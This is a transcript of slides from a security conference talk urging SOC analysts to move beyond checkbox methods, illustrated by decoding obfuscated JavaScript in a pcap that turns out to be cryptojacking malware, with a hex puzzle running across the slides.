Following The Breadcrumbs · 2018-09-06 · Event Selected: Nothing odd here? x56 x32 x68 x68 x64...
Transcript of Following The Breadcrumbs · 2018-09-06 · Event Selected: Nothing odd here? x56 x32 x68 x68 x64...
Following The BreadcrumbsPresented by: SSgt Samuel Kimmons
x56 x32
Before We Begin•All thoughts and opinions expressed by me during this presentation are my own and do not represent those of my employer.
x56 x32 x68 x68
$>whoami:Samuel Kimmons
Attribs:• Cyber Threat Emulator (Pentesting) & Air Force Cyberspace Defense Analyst (ACD-O)
• 33rd Network Warfare Squadron • Also known as: The Air Force Computer Emergency Response Team (AFCERT)
• GIAC Web Application Penetration Tester (GWAPT)• GIAC Certified Incident Handler (GCIH)• Pursuing a M.S. in Cyber Security at New York University (NYU)• In My Spare Time:
• Capture The Flag (CTF) Player• Python Scripter • Certification Collector
How To Contact Me?Official email: [email protected] email: [email protected]@5pecial__K via Twitter
x56 x32 x68 x68 x64 x43
So What Does That Mean?
x56 x32 x68 x68 x64 x43 x42 x35
• I’m passionate about Cyber Security.• I love solving complex problems.• I attempt to look at situations a bit differently.• This stuff is just all around fun.
Let’s Jump Right In
x56 x32 x68 x68 x64 x43 x42 x35 x62 x33
Imagine you’re an analyst starting your day:• You grab your coffee.• Get logged into the SIEM.• Throw on some headphones and get to work.
All of a sudden, alerts start firing!
What could it be?• An APT?• Malicious file execution?• Or maybe nothing at all?
Just Pick One!
x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67
What’s your organization’s policy?• First in the queue?• Severity level?• Or is it random?
For this scenario, let’s go with: Trojanware.
Trojanware: • Simply a program that’s doing something
that it isn’t supposed to be doing.
Event Selected: Nothing odd here?
x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32
Seems like a no brainer investigation.
Just follow your procedural steps:• Check the pcap• Check the IPs/URLs• Run any hashes through Virus Total, Threatminer,
AlienVault, etc..
Maybe it’s an Internal to Internal IP, that means non-malicious right?
Why is the alert firing?
Mark It As Benign
x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32 x56 x6c
The alert fired on Trojanware, that’s probably because something conducted an out of the ordinary action.• All of the sensors / security devices gave you a thumbs up.• But what about that block of code in the pcap? Maybe the analyst thought it
was just apart of the session data?
At this point a lot of junior and some experienced analysts would close it out, and move.
Was The Analyst Wrong?
x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32 x56 x6c x49 x47
Maybe nothing seemed truly odd or out of place. What they followed:
• Rinse and Repeat• Cut and Dry• Copy and Paste
Styles of Analysis, that they most likely follow for every investigation.
Is the Analyst to blame, or are the box checking styles of analysis the root cause?Maybe it’s the organization that’s locking them into these analytical methodologies?
These limiting analytical methodologies can be a plague upon Cyber Security Operations in an Organization.
So why do we lock our analysts into these procedural thinking methods? Shouldn’t we empower them to think differently?
Run It Again!
x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32 x56 x6c x49 x47 x6c x7a
Let’s start over, but without the limiting factors of a checkbox methodology.
Empower the Analyst to think more freely, and approach each data point in a dynamic way.
Equip your Sherlock Holmes hat and get to it!
Let’s Try This Again
x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32 x56 x6c x49 x47 x6c x7a x49 x47
Imagine that the first run through was pretty accurate.
The Analyst verified that none of the available data was malicious.Well not exactly..
Looks like a typical blob of data in a pcap…
Does it though?
Do you remember that snippet of code?
Moving BeyondTaking a step outside of the old methodology:• We can come to the conclusion that there is some level of encoding at play here.• Maybe:• Hex or Base64 encoding.
• Run it through some tools:• Base64 Decoder• Cyberchef• Etc.
x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32 x56 x6c x49 x47 x6c x7a x49 x47 x31 x6c
Now We’re CookingThe structure of the code starts to become apparent. Now remember this alert was most likely triggered from web traffic.Could it be some malicious script?
I think we’re on to something here!Hex encoding? The plot thickens!
x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32 x56 x6c x49 x47 x6c x7a x49 x47 x31 x6c x63 x6d
Hex Be GoneUtilizing a tool to convert hex into plain text we can see what’s actually going on.
Tada!
What is the script doing?• We know it’s JavaScript.• We can see URLs.
What if we as the Analyst haven’t the faintest idea of what JavaScript can do?
Time to break out the ole Google-fu!
x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32 x56 x6c x49 x47 x6c x7a x49 x47 x31 x6c x63 x6d x56 x73
A Few Moments Later…
Boom!
Based on the code, it appears that the JavaScript file is attempting to redirect the user.
It may not have been obvious in the beginning but a certain level of obfuscation was being used in this script.
Obfuscation?What is obfuscation and how should we as Analysts approach it?
Obfuscation according to techtarget.com:
“Obfuscation is the practice of making something difficult to understand. Programming code is often obfuscated to protect intellectual property and prevent an attacker from reverse engineering a proprietary software.”
Like with every piece of technology developed for a good purpose, someone has probably weaponized it.
For example: • DNS used for Command and Control.• Interprotocol exploitation. • Etc. There are tons of examples.
Given enough time an Analyst could attempt to reverse engineer a piece of obfuscated code.
By not so simply following the breadcrumbs.Depending on the level of complexity, this may take some time. It is however possible!
x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32 x56 x6c x49 x47 x6c x7a x49 x47 x31 x6c x63 x6d x56 x73 x65 x53 x42 x68
The Initial Run Through
Investigation Part 1:• Straightforward.• Analyst had restrictive guidelines.• A simple methodology was used.
This type of approach operates along the lines of assuming the malicious actions will jump right out at them.
A simple analytical methodology may work some times.
That sure is putting faith in the tuning of your security devices.
x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32 x56 x6c x49 x47 x6c x7a x49 x47 x31 x6c x63 x6d x56 x73 x65 x53 x42 x68 x62 x69 x42 x70
Final Run Through
Investigation Part 2:• Started the same way as the first run through.• The answer wasn’t blatantly obvious.• Had to apply a different methodology.• Followed the breadcrumbs, which led to our final result.
Stepping off point
Data Point
Spawned More
Questions
Data Analyzed
Analysis Driven Results
x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32 x56 x6c x49 x47 x6c x7a x49 x47 x31 x6c x63 x6d x56 x73 x65 x53 x42 x68 x62 x69 x42 x70 x62 x47 x78 x31
Can You Follow The Breadcrumbs?It’s rare!
An advanced attacker will most likely not leave simple breadcrumbs behind.More specifically an APT!
The threats facing your organization:• Aren’t adhering to limiting guidelines.• Will try whatever possible to complete their objectives.
The adversary isn’t locking themselves into a procedural box.
So why should we?
Allowing our Analysts to think outside the box can greatly increase the odds of identifying nefarious actions.
x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32 x56 x6c x49 x47 x6c x7a x49 x47 x31 x6c x63 x6d x56 x73 x65 x53 x42 x68 x62 x69 x42 x70 x62 x47 x78 x31 x63 x32 x6c x76
Putting The Puzzle Together
As Analysts or Investigators we’re often tasked with putting pieces of various types and amounts of data together to create an understandable picture of the events that led to an alert.
This can often be time consuming and require you to think a certain way.
x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32 x56 x6c x49 x47 x6c x7a x49 x47 x31 x6c x63 x6d x56 x73 x65 x53 x42 x68 x62 x69 x42 x70 x62 x47 x78 x31 x63 x32 x6c x76 x62 x69
A Recipe For Disaster
An example that just so happens to involve breadcrumbs:• An alert fires for Trojanware
• A fellow Analyst asks for help.• Began to analyze:
• IPs / URLs = Checks out, nothing odd• Past events = Checks out, nothing odd
• In the pcap: some type of obfuscated code• Analyzed the code
• Base64 encoded• Decoded the JavaScript• Appears to also have URLs encoded in hex• After restoring the original data = Found to be CryptoJacking Malware!
Who would have ever thought as an Analyst you would be analyzing malware on a baking site hosting a breadcrumb recipe?
x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32 x56 x6c x49 x47 x6c x7a x49 x47 x31 x6c x63 x6d x56 x73 x65 x53 x42 x68 x62 x69 x42 x70 x62 x47 x78 x31 x63 x32 x6c x76 x62 x69 x34 x3d
Endgame
What have we learned?• That we should approach every investigation in a dynamic manner.• Our methods should be adaptable to the information we have available to us.• There’s no way our security devices can detect everything!
• That’s where we as the Analysts come in.
• It is truly up to us to really drill down and determine if an event is malicious or simple noise in the SIEM.
Are you employing the correct analytical methodology?
The best methodology is the one that is fluid and can be implemented into every step of an investigation.
The Breadcrumb ChallengeSo did you follow the Breadcrumbs?
You may have noticed the hex on each slide.
Challenge:
The first individual to contact me with theanswer will get a copy of The Blue Team Field Manual.
Personal email: [email protected]@5pecial__K via Twitter
Two Underscores
Questions?Contact info:Official email: [email protected] email: [email protected]@5pecial__K via Twitter